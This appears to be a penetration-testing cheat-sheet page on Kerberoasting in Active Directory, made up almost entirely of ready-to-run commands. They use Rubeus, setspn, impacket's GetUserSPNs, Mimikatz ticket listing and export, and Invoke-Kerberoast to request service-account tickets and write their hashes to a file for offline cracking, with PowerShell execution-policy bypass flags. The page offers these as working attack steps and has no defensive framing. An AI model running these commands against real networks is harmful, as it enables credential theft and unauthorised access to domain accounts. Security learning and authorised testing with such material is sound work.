Kerberoasting

If an account has SPN (Service Principal Name) set. We can request that account hash and try to crack it locally

For kerberos to work, times have to be within 5 minutes between attacker and victim.

Rubeus

.\rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234 /nowrap

Getting SPNs

There are many ways to do it. 

setspn.exe -t ecorp.local -q */*
powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1"
python3 /opt/impacket/examples/GetUserSPNs.py -request  -target-domain ecorp.local ecorp/morph3:Password123@10.10.10.21 -dc-ip 10.10.10.21

Mimikatz

Listing cached tickets

Invoke-Mimikatz -Command '"kerberos::list"'
powershell.exe -c "klist"
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"kerberos::list"'"

Extracting tickets

Invoke-Mimikatz -Command '"kerberos::list /export"'

Invoke-Kerberoast

This powershell script is always my go to. It works pretty fine

powershell.exe -c "Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat"
powershell.exe -ep bypass -nop
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerberoast.txt
PreviousSeDebugPrivilegeNextLateral Movement

Last updated